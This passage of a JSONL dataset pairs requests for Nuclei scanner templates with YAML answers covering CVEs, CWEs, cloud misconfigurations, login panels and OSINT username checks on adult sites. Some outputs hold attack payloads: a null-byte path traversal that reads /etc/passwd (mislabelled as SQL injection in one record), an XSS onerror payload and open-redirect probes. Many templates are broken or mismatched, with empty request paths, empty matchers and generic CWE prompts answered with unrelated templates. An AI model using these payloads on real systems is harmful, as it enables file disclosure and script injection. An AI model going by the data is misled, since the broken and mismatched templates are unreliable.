CMS is misconfigured.\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: misconfigured-concrete5\n\ninfo:\n name: Misconfigured Concrete5\n author: pdteam\n severity: low\n description: Concrete5 CMS is misconfigured.\n tags: misconfig,concrete,cms,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"concrete5 has encountered an issue\" \n part: body", "category": "generic", "severity": "low", "id": "misconfigured-concrete5"} {"instruction": "Generate a Nuclei template for: DragonFly Login - Panel", "input": "Title: DragonFly Login - Panel\nSummary: DragonFly Login - Panel. Dragonfly Login Panel was discovered\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: dragonfly-panel\n\ninfo:\n name: DragonFly Login - Panel\n author: DhiyaneshDK\n severity: info\n description: Dragonfly Login Panel was discovered\n tags: dragonfly,panel,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"href=\"logo-dragonfly.png\"\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "dragonfly-panel"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: xphoneconnect-admin-panel\n\ninfo:\n name: XPhone Connect Admin Interface - Detect\n author: FLX\n severity: info\n description: Detects the presence of the XPhone Connect admin interface.\n tags: panel,xphone,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/xphoneconnect/admin/Login.aspx\" \n matchers:\n - type: word\n words:\n - \"XPhone Connect server - Logon\" \n - \"XPhone Web-Meeting\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: imagefap\n\ninfo:\n name: Imagefap User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Imagefap user name information check was conducted.\n tags: osint,osint-porn,imagefap,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.imagefap.com/profile/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"s Profile\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: Azure App Service Always On Disabled", "input": "Title: Azure App Service Always On Disabled\nSummary: Azure App Service Always On Disabled. Ensure that your Microsoft Azure App Services web applications have Always On feature enabled in order to prevent applications from being idled out due to inactivity. Always On keeps your websites/web applications loaded even when there's no traffic.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-appservice-always-on-disabled\n\ninfo:\n name: Azure App Service Always On Disabled\n author: princechaddha\n severity: medium\n description: Ensure that your Microsoft Azure App Services web applications have Always On feature enabled in order to prevent applications from being idled out due to inactivity. Always On keeps your websites/web applications loaded even when there's no traffic.\n tags: cloud,devops,azure,microsoft,appservice,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-appservice-always-on-disabled"} {"instruction": "Generate a Nuclei template for: Virtual Machine Disk Encryption with Customer-Managed Keys Not Enabled", "input": "Title: Virtual Machine Disk Encryption with Customer-Managed Keys Not Enabled\nSummary: Virtual Machine Disk Encryption with Customer-Managed Keys Not Enabled. Ensure that the persistent disks attached to your Google Compute Engine instances are encrypted with Customer-Managed Keys (CMKs) in order to have a fine control over your sensitive data encryption and decryption process. You can create and manage your own Customer-Managed Keys (CMKs) with Cloud Key Management Service (Cloud KMS). Cloud KMS provides secure and efficient encryption key management, controlled key rotation, and\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: gcloud-vm-disk-cmk-not-enabled\n\ninfo:\n name: Virtual Machine Disk Encryption with Customer-Managed Keys Not Enabled\n author: princechaddha\n severity: high\n description: Ensure that the persistent disks attached to your Google Compute Engine instances are encrypted with Customer-Managed Keys (CMKs) in order to have a fine control over your sensitive data encryption and decryption process. You can create and manage your own Customer-Managed Keys (CMKs) with Cloud Key Management Service (Cloud KMS). Cloud KMS provides secure and efficient encryption key management, controlled key rotation, and revocation mechanisms.\n tags: cloud,devops,gcp,gcloud,compute,encryption,cmk,security,gcp-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "gcloud-vm-disk-cmk-not-enabled"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vmware-vcenter-converter-standalone\n\ninfo:\n name: VMware vCenter Converter Panel - Detect\n author: DhiyaneshDK\n severity: info\n description: VMware vCenter Converter panel was detected.\n tags: panel,vmware,vcenter,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"VMware vCenter Converter Standalone\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: justforfans\n\ninfo:\n name: Justforfans User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Justforfans user name information check was conducted.\n tags: osint,osint-porn,justforfans,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://justfor.fans/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \" @ JustFor.Fans\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2018-14474", "input": "Title: Vulnerability (CWE-601) in goodoldweb orange_forum\nSummary: views/auth.go in Orange Forum 1.4.0 allows Open Redirection via the next parameter to /login or /signup.\nVulnerability Type: Vulnerability (CWE-601)\nSeverity: medium\nAffected Products: goodoldweb orange_forum\nIndicators: error, vulnerability detected", "output": "id: CVE-2018-14474\n\ninfo:\n name: Orange Forum 1.4.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Orange Forum 1.4.0 contains an open redirect vulnerability in views/auth.go via the next parameter to /login or /signup. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: cve2018,cve,redirect,orangeforum,oss,seclists,goodoldweb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?next=http://interact.sh/?app.scan/\" \n - \"{{BaseURL}}/signup?next=http://interact.sh/?app.scan/\" \n matchers:\n - type: regex\n part: header", "category": "cve", "severity": "medium", "id": "CVE-2018-14474"} {"instruction": "Generate a Nuclei template for CVE-2020-14144", "input": "Title: OS Command Injection in gitea gitea\nSummary: The git hook feature in Gitea 1.1.0 through 1.12.5 might allow for authenticated remote code execution in customer environments where the documentation was not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states \"This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.\nVulnerability Type: OS Command Injection\nSeverity: high\nAffected Products: gitea gitea\nIndicators: warning", "output": "id: CVE-2020-14144\n\ninfo:\n name: Gitea 1.1.0 - 1.12.5 - Remote Code Execution\n author: theamanrawat\n severity: high\n description: Gitea 1.1.0 through 1.12.5 is susceptible to authenticated remote code execution, via the git hook functionality, in customer environments where the documentation is not understood (e.g., one viewpoint is that the dangerousness of this feature should be documented immediately above the ENABLE_GIT_HOOKS line in the config file). NOTE: The vendor has indicated this is not a vulnerability and states \"This is a functionality of the software that is limited to a subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.\"\n tags: cve2020,cve,rce,gitea,authenticated,git,intrusive,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"http\" \n part: interactsh_protocol\n - type: word\n words:\n - \"Gitea:\" \n part: body_1", "category": "cve", "severity": "high", "id": "CVE-2020-14144"} {"instruction": "Generate a Nuclei template for CVE-2010-2035", "input": "Title: Path Traversal in percha com_perchagallery\nSummary: Directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: percha com_perchagallery\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-2035\n\ninfo:\n name: Joomla! Component Percha Gallery 1.6 Beta - Directory Traversal\n author: daffainfo\n severity: high\n description: A directory traversal vulnerability in the Percha Gallery (com_perchagallery) component 1.6 Beta for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the controller parameter to index.php.\n tags: cve,cve2010,packetstorm,joomla,lfi,edb,percha,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-2035"} {"instruction": "Generate a Nuclei template for: 3Com Wireless 8760 Dual Radio - Default Login", "input": "Title: 3Com Wireless 8760 Dual Radio - Default Login\nSummary: 3Com Wireless 8760 Dual Radio - Default Login. 3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: 3Com-wireless-default-login\n\ninfo:\n name: 3Com Wireless 8760 Dual Radio - Default Login\n author: ritikchaddha\n severity: high\n description: 3COM Wireless 8760 Dual Radio contains a default login vulnerability. Default admin login password 'password' was found.\n tags: default-login,3com,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"alt=\"Advanced Configuration\"\" \n - \"image/setup_wizard\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "3Com-wireless-default-login"} {"instruction": "Generate a Nuclei template for CVE-2010-5028", "input": "Title: SQL Injection in harmistechnology com_jejob\nSummary: SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.\nVulnerability Type: SQL Injection\nSeverity: high\nAffected Products: harmistechnology com_jejob\nIndicators: error, vulnerability detected", "output": "id: CVE-2010-5028\n\ninfo:\n name: Joomla! Component JE Job 1.0 - Local File Inclusion\n author: daffainfo\n severity: high\n description: A SQL injection vulnerability in the JExtensions JE Job (com_jejob) component 1.0 for Joomla! allows remote attackers to execute arbitrary SQL commands via the catid parameter in an item action to index.php.\n tags: cve,cve2010,joomla,lfi,edb,harmistechnology,sqli,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?option=com_jejob&view=../../../../../../etc/passwd%00\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2010-5028"} {"instruction": "Generate a Nuclei template for: Azure Network Security Group Delete Alert Not Configured", "input": "Title: Azure Network Security Group Delete Alert Not Configured\nSummary: Azure Network Security Group Delete Alert Not Configured. Ensure that an Azure activity log alert is used to detect \"Delete Network Security Group\" events in your Microsoft Azure cloud account. Activity log alerts get activated when a new activity log event that matches the condition specified in the alert occurs. In this case, the condition used is 'Whenever the Administrative Activity Log \"Delete Network Security Group (networkSecurityGroups)\" has \"any\" level, with \"any\" status and event is in\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: azure-nsg-delete-unalerted\n\ninfo:\n name: Azure Network Security Group Delete Alert Not Configured\n author: princechaddha\n severity: high\n description: Ensure that an Azure activity log alert is used to detect \"Delete Network Security Group\" events in your Microsoft Azure cloud account. Activity log alerts get activated when a new activity log event that matches the condition specified in the alert occurs. In this case, the condition used is 'Whenever the Administrative Activity Log \"Delete Network Security Group (networkSecurityGroups)\" has \"any\" level, with \"any\" status and event is initiated by \"any\"'.\n tags: cloud,devops,azure,microsoft,network-security-group,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "azure-nsg-delete-unalerted"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: jupyterhub-default-login\n\ninfo:\n name: Jupyterhub - Default Admin Discovery\n author: For3stCo1d\n severity: high\n description: Jupyterhub default admin credentials were discovered.\n tags: jupyterhub,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: memrise\n\ninfo:\n name: Memrise User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Memrise user name information check was conducted.\n tags: osint,osint-hobby,memrise,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://app.memrise.com/user/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"followers\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Open Redirect", "input": "Title: Open Redirect (CWE-601)\nSummary: The web application accepts a user-controlled input that specifies a link to an external site, and uses that link in a redirect.\nVulnerability Type: Open Redirect\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: weekender-newspaper-open-redirect\n\ninfo:\n name: WordPress Weekender Newspaper 9.0 - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: WordPress Weekender Newspaper theme 9.0 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n tags: wordpress,wp-plugin,redirect,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA==\" \n matchers:\n - type: regex\n part: header", "category": "cwe", "severity": "high", "id": "CWE-601"} {"instruction": "Generate a Nuclei template for: Read the Docs Takeover Detection", "input": "Title: Read the Docs Takeover Detection\nSummary: Read the Docs Takeover Detection. Read the Docs takeover was detected.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: readthedocs-takeover\n\ninfo:\n name: Read the Docs Takeover Detection\n author: pdteam\n severity: high\n description: Read the Docs takeover was detected.\n tags: takeover,readthedocs,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n - type: word\n words:\n - \"unknown to Read the Docs\"", "category": "generic", "severity": "high", "id": "readthedocs-takeover"} {"instruction": "Generate a Nuclei template for: Mac OS X Server FTP Service - Detect", "input": "Title: Mac OS X Server FTP Service - Detect\nSummary: Mac OS X Server FTP Service - Detect. Mac OS X Server FTP service was detected.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: macosx-ftp-detect\n\ninfo:\n name: Mac OS X Server FTP Service - Detect\n author: pussycat0x\n severity: info\n description: Mac OS X Server FTP service was detected.\n tags: network,ftp,macosx,detect,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "macosx-ftp-detect"} {"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: szhe-default-login\n\ninfo:\n name: Szhe Default Login\n author: pikpikcu\n severity: medium\n description: Szhe default login information was discovered.\n tags: szhe,default-login,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"You should be redirected automatically to target URL: /\" \n - type: word\n words:\n - \"Set-Cookie: session\" \n part: header\n - type: status\n status:\n - 302", "category": "cwe", "severity": "medium", "id": "CWE-522"} {"instruction": "Generate a Nuclei template for: DNS Zone Transfer Allowed to Any Host", "input": "Title: DNS Zone Transfer Allowed to Any Host\nSummary: DNS Zone Transfer Allowed to Any Host. DNS Zone Transfer configured with \"allow-transfer { any; };\" allowed unrestricted zone transfers.This exposed sensitive details like hostnames, network structure, and system data that attackers could use for reconnaissance and further attacks.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: dns-zone-transfer-any\n\ninfo:\n name: DNS Zone Transfer Allowed to Any Host\n author: songyaeji\n severity: high\n description: DNS Zone Transfer configured with \"allow-transfer { any; };\" allowed unrestricted zone transfers.This exposed sensitive details like hostnames, network structure, and system data that attackers could use for reconnaissance and further attacks.\n tags: linux,local,kisa,audit,compliance\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "dns-zone-transfer-any"} {"instruction": "Generate a Nuclei template for: Silverlight cross-domain policy", "input": "Title: Silverlight cross-domain policy\nSummary: Silverlight cross-domain policy. Tags: miscellaneous, misc, vuln\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: clientaccesspolicy\n\ninfo:\n name: Silverlight cross-domain policy\n author: emadshanab\n severity: info\n description: Silverlight cross-domain policy\n tags: miscellaneous,misc,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/clientaccesspolicy.xml\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"\" \n - \"domain uri=\" \n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "clientaccesspolicy"} {"instruction": "Generate a Nuclei template for CVE-2022-1170", "input": "Title: Cross-Site Scripting (XSS) in nootheme jobmonster\nSummary: In the Noo JobMonster WordPress theme before 4.5.2.9 JobMonster there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: nootheme jobmonster\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-1170\n\ninfo:\n name: JobMonster < 4.5.2.9 - Cross-Site Scripting\n author: Akincibor,ritikchaddha\n severity: medium\n description: In the theme JobMonster < 4.5.2.9 there is a XSS vulnerability as the input for the search form is provided through unsanitized GET requests.\n tags: cve,cve2022,wpscan,wp,wp-theme,wordpress,xss,jobmonster,nootheme,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/resumes/?s=%22%3E%3Cimg+src%3Dx+onerror%3Dalert(document.domain)%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n - \"noo-resume\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-1170"} {"instruction": "Generate a Nuclei template for: ZeroShell Security Checks", "input": "Title: ZeroShell Security Checks\nSummary: ZeroShell Security Checks. A simple workflow that runs all ZeroShell related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: zeroshell-workflow\n\ninfo:\n name: ZeroShell Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all ZeroShell related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "zeroshell-workflow"} {"instruction": "Generate a Nuclei template for: PDI Intellifuel - Device Page", "input": "Title: PDI Intellifuel - Device Page\nSummary: PDI Intellifuel - Device Page. Tags: exposure, pdi, intellifuel\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: pdi-device-page\n\ninfo:\n name: PDI Intellifuel - Device Page\n author: DhiyaneshDk\n severity: low\n description: PDI Intellifuel - Device Page\n tags: exposure,pdi,intellifuel,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php\" \n matchers:\n - type: word\n words:\n - \"Intellifuel Device page\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "pdi-device-page"} {"instruction": "Generate a Nuclei template for: BasicRAT Malware - Detect", "input": "Title: BasicRAT Malware - Detect\nSummary: BasicRAT Malware - Detect. Tags: malware, file, basicrat\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: basicrat-malware\n\ninfo:\n name: BasicRAT Malware - Detect\n author: daffainfo\n severity: info\n description: BasicRAT Malware - Detect\n tags: malware,file,basicrat\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "basicrat-malware"} {"instruction": "Generate a Nuclei template for CVE-2024-10486", "input": "Title: Missing Authorization in CVE-2024-10486\nSummary: The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.\nVulnerability Type: Missing Authorization\nSeverity: medium\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-10486\n\ninfo:\n name: Google for WooCommerce <= 2.8.6 - Information Disclosure via Publicly Accessible PHP Info File\n author: popcorn94\n severity: medium\n description: The Google for WooCommerce plugin for WordPress is vulnerable to Information Disclosure in all versions up to, and including, 2.8.6. This is due to publicly accessible print_php_information.php file. This makes it possible for unauthenticated attackers to retrieve information about Webserver and PHP configuration, which can be used to aid other attacks.\n tags: cve,cve2024,wp,wordpress,wp-plugin,google-listings-and-ads,info-leak,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/scripts/print_php_information.php\" \n matchers:\n - type: word\n words:\n - \"PHP Extension\" \n - \"PHP Version\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2024-10486"} {"instruction": "Generate a Nuclei template for: Obsolete and less secure SSH Version", "input": "Title: Obsolete and less secure SSH Version\nSummary: Obsolete and less secure SSH Version. Tags: enum, js, ssh\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: obsolete-ssh-version\n\ninfo:\n name: Obsolete and less secure SSH Version\n author: pussycat0x\n severity: info\n description: Obsolete and less secure SSH Version\n tags: enum,js,ssh,network,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "obsolete-ssh-version"} {"instruction": "Generate a Nuclei template for CVE-2025-34035", "input": "Title: Vulnerability (CWE-20) in engeniustech esr300_firmware and others\nSummary: An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier. The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands. The injected commands are executed with root privileges, leading to full system compromise.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: critical\nAffected Products: engeniustech esr300_firmware, engeniustech esr350_firmware, engeniustech esr600_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-34035\n\ninfo:\n name: EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution\n author: intelligent-ears\n severity: critical\n description: An OS command injection vulnerability exists in EnGenius EnShare Cloud Service version 1.4.11 and earlier.The usbinteract.cgi script fails to properly sanitize user input passed to the path parameter, allowing unauthenticated remote attackers to inject arbitrary shell commands.The injected commands are executed with root privileges, leading to full system compromise.\n tags: cve,cve2025,engenius,enshare,rce,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2025-34035"} {"instruction": "Generate a Nuclei template for: Azure VM Managed Identity Not Assigned", "input": "Title: Azure VM Managed Identity Not Assigned\nSummary: Azure VM Managed Identity Not Assigned. Ensure that your Microsoft Azure virtual machines (VMs) have system-assigned managed identities enabled in order to allow secure virtual machine access to Azure resources such as key vaults and storage accounts.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: azure-vm-managed-identity-unassigned\n\ninfo:\n name: Azure VM Managed Identity Not Assigned\n author: princechaddha\n severity: medium\n description: Ensure that your Microsoft Azure virtual machines (VMs) have system-assigned managed identities enabled in order to allow secure virtual machine access to Azure resources such as key vaults and storage accounts.\n tags: cloud,devops,azure,microsoft,vm,azure-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "azure-vm-managed-identity-unassigned"} {"instruction": "Generate a Nuclei template for CVE-2021-40539", "input": "Title: Vulnerability (CWE-706) in zohocorp manageengine_adselfservice_plus\nSummary: Zoho ManageEngine ADSelfService Plus version 6113 and prior is vulnerable to REST API authentication bypass with resultant remote code execution.\nVulnerability Type: Vulnerability (CWE-706)\nSeverity: critical\nAffected Products: zohocorp manageengine_adselfservice_plus\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-40539\n\ninfo:\n name: Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution\n author: daffainfo,pdteam\n severity: critical\n description: Zoho ManageEngine ADSelfService Plus version 6113 and prior are vulnerable to a REST API authentication bypass vulnerability that can lead to remote code execution.\n tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"114f7ce498a54a1be1de1f1e5731d0ea\" \n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2021-40539"} {"instruction": "Generate a Nuclei template for: ManageEngine Applications Manager - Default Credentials", "input": "Title: ManageEngine Applications Manager - Default Credentials\nSummary: ManageEngine Applications Manager - Default Credentials. Default credentials grants administrative access to ManageEngine Applications Manager, which can be later escalated into a RCE via DB queries.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: app-manager-default-login\n\ninfo:\n name: ManageEngine Applications Manager - Default Credentials\n author: 0midC13\n severity: high\n description: Default credentials grants administrative access to ManageEngine Applications Manager, which can be later escalated into a RCE via DB queries.\n tags: default-login,manageengine,zoho,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Super Administrator\" \n - \"Add Application\" \n part: body\n condition: and", "category": "generic", "severity": "high", "id": "app-manager-default-login"} {"instruction": "Generate a Nuclei template for: application.yaml detection", "input": "Title: application.yaml detection\nSummary: application.yaml detection. Finds Application YAML files which often contain sensitive information.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: application-yaml\n\ninfo:\n name: application.yaml detection\n author: Cristi vlad (@cristivlad25)\n severity: info\n description: Finds Application YAML files which often contain sensitive information.\n tags: misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/app.yaml\" \n - \"{{BaseURL}}/app.yml\" \n - \"{{BaseURL}}/application.yaml\" \n - 